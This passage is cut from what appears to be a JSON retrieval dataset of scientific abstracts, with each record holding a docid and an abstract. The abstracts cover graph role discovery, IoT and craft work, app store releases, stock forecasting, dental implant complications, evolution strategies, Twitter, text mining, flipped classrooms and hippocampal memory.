"text": "Roles represent node-level connectivity patterns such as star-center, star-edge nodes, near-cliques or nodes that act as bridges to different regions of the graph. Intuitively, two nodes belong to the same role if they are structurally similar. Roles have been mainly of interest to sociologists, but more recently, roles have become increasingly useful in other domains. Traditionally, the notion of roles were defined based on graph equivalences such as structural, regular, and stochastic equivalences. We briefly revisit these early notions and instead propose a more general formulation of roles based on the similarity of a feature representation (in contrast to the graph representation). This leads us to propose a taxonomy of three general classes of techniques for discovering roles that includes (i) graph-based roles, (ii) feature-based roles, and (iii) hybrid roles. We also propose a flexible framework for discovering roles using the notion of similarity on a feature-based representation. The framework consists of two fundamental components: (a) role feature construction and (b) role assignment using the learned feature representation. We discuss the different possibilities for discovering feature-based roles and the tradeoffs of the many techniques for computing them. Finally, we discuss potential applications and future directions and challenges.",
"title": ""
},
{
"docid": "4290b4ba8000aeaf24cd7fb8640b4570",
"text": "Drawing on semi-structured interviews and cognitive mapping with 14 craftspeople, this paper analyzes the socio-technical arrangements of people and tools in the context of workspaces and productivity. Using actor-network theory and the concept of companionability, both of which emphasize the role of human and non-human actants in the socio-technical fabrics of everyday life, I analyze the relationships between people, productivity and technology through the following themes: embodiment, provenance, insecurity, flow and companionability. The discussion section develops these themes further through comparison with rhetoric surrounding the Internet of Things (IoT). By putting the experiences of craftspeople in conversation with IoT rhetoric, I suggest several policy interventions for understanding connectivity and inter-device operability as material, flexible and respectful of human agency.",
"title": ""
},
{
"docid": "f00346b04e9333a7fd4647d3b23c855d",
"text": "App developers would like to know the characteristics of app releases that achieve high impact. To address this, we mined the most consistently popular Google Play and Windows Phone apps, once per week, over a period of 12 months. In total we collected 3,187 releases, from which we identified 1,547 for which there was adequate prior and posterior time series data to facilitate causal impact assessment, analysing the properties that distinguish impactful and non-impactful releases. We find that 40% of target releases impacted performance in the Google store and 55% of target releases impacted performance in the Windows store. We find evidence that more mentions of features and fewer mentions of bug fixing can increase the chance for a release to be impactful, and to improve rating. UCL DEPARTMENT OF COMPUTER SCIENCE",
"title": ""
},
{
"docid": "84c37ea2545042a2654b162491846628",
"text": "Ever since the agile manifesto was created in 2001, the research community has devoted a great deal of attention to agile software development. This article examines publications and citations to illustrate how the research on agile has progressed in the 10 years following the articulation of the manifesto. nformation systems Xtreme programming, XP",
"title": ""
},
{
"docid": "4afdb551efb88711ffe3564763c3806a",
"text": "This article applied GARCH model instead AR or ARMA model to compare with the standard BP and SVM in forecasting of the four international including two Asian stock markets indices.These models were evaluated on five performance metrics or criteria. Our experimental results showed the superiority of SVM and GARCH models, compared to the standard BP in forecasting of the four international stock markets indices.",
"title": ""
},
{
"docid": "30db2040ab00fd5eec7b1eb08526f8e8",
"text": "We formulate an equivalence between machine learning and the formulation of statistical data assimilation as used widely in physical and biological sciences. The correspondence is that layer number in a feedforward artificial network setting is the analog of time in the data assimilation setting. This connection has been noted in the machine learning literature. We add a perspective that expands on how methods from statistical physics and aspects of Lagrangian and Hamiltonian dynamics play a role in how networks can be trained and designed. Within the discussion of this equivalence, we show that adding more layers (making the network deeper) is analogous to adding temporal resolution in a data assimilation framework. Extending this equivalence to recurrent networks is also discussed. We explore how one can find a candidate for the global minimum of the cost functions in the machine learning context using a method from data assimilation. Calculations on simple models from both sides of the equivalence are reported. Also discussed is a framework in which the time or layer label is taken to be continuous, providing a differential equation, the Euler-Lagrange equation and its boundary conditions, as a necessary condition for a minimum of the cost function. This shows that the problem being solved is a two-point boundary value problem familiar in the discussion of variational methods. The use of continuous layers is denoted “deepest learning.” These problems respect a symplectic symmetry in continuous layer phase space. Both Lagrangian versions and Hamiltonian versions of these problems are presented. Their well-studied implementation in a discrete time/layer, while respecting the symplectic structure, is addressed. The Hamiltonian version provides a direct rationale for backpropagation as a solution method for a certain two-point boundary value problem.",
"title": ""
},
{
"docid": "617aca6820f774473944b9bfe822cc81",
"text": "Dental implant surgery has become routine treatment in dentistry and is generally considered to be a safe surgical procedure with a high success rate. However, complications should be taken into consideration because they can follow dental implant surgery as with any other surgical procedure. Many of the complications can be resolved without severe problems; however, in some cases, they can cause dental implant failure or even lifethreatening circumstances. Avoiding complications begins with careful treatment planning based on accurate preoperative anatomic evaluations and an understanding of all potential problems. This chapter contains surgical complications associated with dental implant surgery and management.",
"title": ""
},
{
"docid": "64baa8b11855ad6333ae67f18c6b56b0",
"text": "The covariance matrix adaptation evolution strategy (CMA-ES) rates among the most successful evolutionary algorithms for continuous parameter optimization. Nevertheless, it is plagued with some drawbacks like the complexity of the adaptation process and the reliance on a number of sophisticatedly constructed strategy parameter formulae for which no or little theoretical substantiation is available. Furthermore, the CMA-ES does not work well for large population sizes. In this paper, we propose an alternative – simpler – adaptation step of the covariance matrix which is closer to the ”traditional” mutative self-adaptation. We compare the newly proposed algorithm, which we term the CMSA-ES, with the CMA-ES on a number of different test functions and are able to demonstrate its superiority in particular for large population sizes.",
"title": ""
},
{
"docid": "f5e38c2f59aeb23b951dbe17ffe5729c",
"text": "The microblogging service Twitter is in the process of being appropriated for conversational interaction and is starting to be used for collaboration, as well. In an attempt to determine how well Twitter supports user-to-user exchanges, what people are using Twitter for, and what usage or design modifications would make it (more) usable as a tool for collaboration, this study analyzes a corpus of naturally-occurring public Twitter messages (tweets), focusing on the functions and uses of the @ sign and the coherence of exchanges. The findings reveal a surprising degree of conversationality, facilitated especially by the use of @ as a marker of addressivity, and shed light on the limitations of Twitter's current design for collaborative use.",
"title": ""
},
{
"docid": "1e558e1156af502303eb1016f48949d0",
"text": "R. W. White (1959) proposed that certain motives, such as curiosity, autonomy, and play (called intrinsic motives, or IMs), have common characteristics that distinguish them from drives. The evidence that mastery is common to IMs is anecdotal, not scientific. The assertion that “intrinsic enjoyment” is common to IMs exaggerates the significance of pleasure in human motivation and expresses the hedonistic fallacy of confusing consequence for cause. Nothing has been shown scientifically to be common to IMs that differentiates them from drives. An empirically testable theory of 16 basic desires is put forth based on psychometric research and subsequent behavior validation. The desires are largely unrelated to each other and may have different evolutionary histories.",
"title": ""
},
{
"docid": "c5f6a559d8361ad509ec10bbb6c3cc9b",
"text": "In this paper we present a system for automatic story generation that reuses existing stories to produce a new story that matches a given user query. The plot structure is obtained by a case-based reasoning (CBR) process over a case base of tales and an ontology of explicitly declared relevant knowledge. The resulting story is generated as a sketch of a plot described in natural language by means of natural language generation (NLG) techniques.",
"title": ""
},
{
"docid": "f0b02824162279793d2c29f8aa7e28a2",
"text": "Text mining is a very exciting research area as it tries to discover knowledge from unstructured texts. These texts can be found on a computer desktop, intranets and the internet. The aim of this paper is to give an overview of text mining in the contexts of its techniques, application domains and the most challenging issue. The focus is given on fundamentals methods of text mining which include natural language possessing and information extraction. This paper also gives a short review on domains which have employed text mining. The challenging issue in text mining which is caused by the complexity in a natural language is also addressed in this paper.",
"title": ""
},
{
"docid": "ea525c15c1cbb4a4a716e897287fd770",
"text": "This study explored student teachers’ cognitive presence and learning achievements by integrating the SOP Model in which self-study (S), online group discussion (O) and double-stage presentations (P) were implemented in the flipped classroom. The research was conducted at a university in Taiwan with 31 student teachers. Preand post-worksheets measuring knowledge of educational issues were administered before and after group discussion. Quantitative content analysis and behavior sequential analysis were used to evaluate cognitive presence, while a paired-samples t-test analyzed learning achievement. The results showed that the participants had the highest proportion of “Exploration,” the second largest rate of “Integration,” but rarely reached “Resolution.” The participants’ achievements were greatly enhanced using the SOP Model in terms of the scores of the preand post-worksheets. Moreover, the groups with a higher proportion of “Integration” (I) and “Resolution” (R) performed best in the post-worksheets and were also the most progressive groups. Both highand low-rated groups had significant correlations between the “I” and “R” phases, with “I” “R” in the low-rated groups but “R” “I” in the high-rated groups. The instructional design of the SOP Model can be a reference for future pedagogical implementations in the higher educational context.",
"title": ""
},
{
"docid": "250bb85dc0659f21ba8bbaa42b9b30ce",
"text": "The hippocampus and surrounding regions of the medial temporal lobe play a central role in all neuropsychological theories of memory. It is still a matter of debate, however, how best to characterise the functions of these regions, the hippocampus in particular. In this article, I examine the proposal that the hippocampus is a \"stupid\" module whose specific domain is consciously apprehended information. A number of interesting consequences for the organisation of memory and the brain follow from this proposal and the assumptions it entails. These, in turn, have important implications for neuropsychological theories of recent and remote episodic, semantic, and spatial memory and for the functions that episodic memory may serve in perception, comprehension, planning, imagination, and problem solving. I consider these implications by selectively reviewing the literature and primarily drawing on research my collaborators and I have conducted.",
"title": ""
}
] | scidocsrr |